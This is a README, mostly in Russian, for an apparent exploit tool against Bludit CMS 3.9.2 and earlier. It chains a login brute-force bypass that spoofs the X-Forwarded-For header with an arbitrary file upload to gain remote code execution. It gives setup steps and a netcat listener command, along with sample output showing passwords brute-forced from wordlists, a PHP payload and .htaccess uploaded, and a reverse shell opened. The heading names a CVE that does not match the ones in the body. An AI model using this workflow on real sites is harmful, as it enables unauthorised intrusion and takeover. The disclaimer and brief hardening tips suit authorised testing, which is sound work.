
cve-2016-16113
_ _____ ___ _
__| |___ /_ ___ __ / _ \ _ __ ___ (_)
/ _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
\__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|
Автоматизированный инструмент эксплуатации, который объединяет CVE-2019-17240 (обход аутентификации) и CVE-2019-16113 (произвольная загрузка файлов) для достижения удалённого выполнения кода на уязвимых установках Bludit CMS.
ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ НА БЕЗОПАСНОСТЬ
Этот инструмент предназначен для специалистов по безопасности, проводящих авторизованные тесты на проникновение, и исследователей безопасности, действующих в правовых рамках. Несанкционированный доступ к компьютерным системам является незаконным в соответствии с такими законами, как Закон о мошенничестве и злоупотреблениях с использованием компьютеров (CFAA) в США, и аналогичным законодательством по всему миру.
Используя этот инструмент, вы соглашаетесь:
Автор не несёт ответственности и не отвечает за любое неправомерное использование или ущерб, причинённый этим инструментом.
Этот эксплойт автоматизирует процесс:
X-Forwarded-For)Затронутые версии: Bludit CMS версии 3.9.2 и ниже
.htaccess для расширенной эксплуатацииrequests# Clone the repository
git clone https://github.com/yourusername/get-rce.git
cd get-rce
# Install dependencies
pip install -r requirements.txt
requirements.txt:
requests>=2.25.0
python3 get_rce.py
Скрипт запросит у вас:
https://target.com)Перед запуском эксплойта настройте слушатель netcat:
nc -lvnp 4444
Замените 4444 на выбранный вами порт.
$ python3 get_rce.py
Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...
[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username):
[...] We are gonna default to 'admin' as username.
[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)
[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt
SecLists: https://github.com/danielmiessler/SecLists
SecLists/Usernames/Names/names.txtSecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txtRockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)
X-Forwarded-For для обхода ограничения частоты запросов/bl-content/tmp/.htaccess для обеспечения выполнения кодаЕсли вы системный администратор:
/bl-content/tmp/Проблема: «Цель, похоже, недоступна»
Проблема: «Не удалось выполнить вход»
Проблема: «Оболочка не получена»
d3vn0mi
Этот проект предоставляется только в образовательных целях и для авторизованного тестирования безопасности. См. отказ от ответственности в начале этого README.
Приветствуются вклады, сообщения об ошибках и запросы новых функций! Загляните на страницу issues.